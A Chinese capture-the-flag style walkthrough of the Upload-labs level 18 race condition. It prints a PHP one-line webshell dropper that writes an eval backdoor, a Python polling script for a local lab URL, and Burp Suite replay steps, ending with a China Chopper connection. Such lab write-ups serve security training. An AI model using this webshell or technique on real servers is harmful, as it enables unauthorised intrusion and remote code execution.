Upload-labs 18 条件竞争——通关

308 阅读1分钟

访问目标站点,提示如下图所示
在这里插入图片描述
查看源码
在这里插入图片描述
思路:上传shell.php.7z图片木马配合解析漏洞进行getshell

实验步骤:

图片中php一句话木马代码:<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>');?>

第一种:使用python脚本

第一步:burpsuite抓包,上传文件名字shell.php.7z,在图片信息最下方是一句话木马:

<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>');?>

(只要被成功当作PHP文件解析,就会生成shell2.php 文件)
在这里插入图片描述
第二步:python脚本打开并运行
python内容:

import requests
url = "http://127.0.0.1/upload-labs/upload/shell.php.7z"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
	    print("NO")

在这里插入图片描述
第三步:在python脚本运行后,burpsuite开始无限制重放数据包
在这里插入图片描述
直到python脚本出现OK,才关闭burpsuite
在这里插入图片描述
第四步:访问生成的shell2.php文件
在这里插入图片描述
中国菜刀连接即可
在这里插入图片描述
在这里插入图片描述
第二种:不使用python脚本
burpsuite与第一种方法一样,无限重放数据包,在无限重放数据包的同时,要一直访问shell.php.7z文件
在这里插入图片描述
直到出现如下界面,说明竞争成功,成功执行shell.php.7z生成shell2.php 文件

在这里插入图片描述
中国菜刀连接即可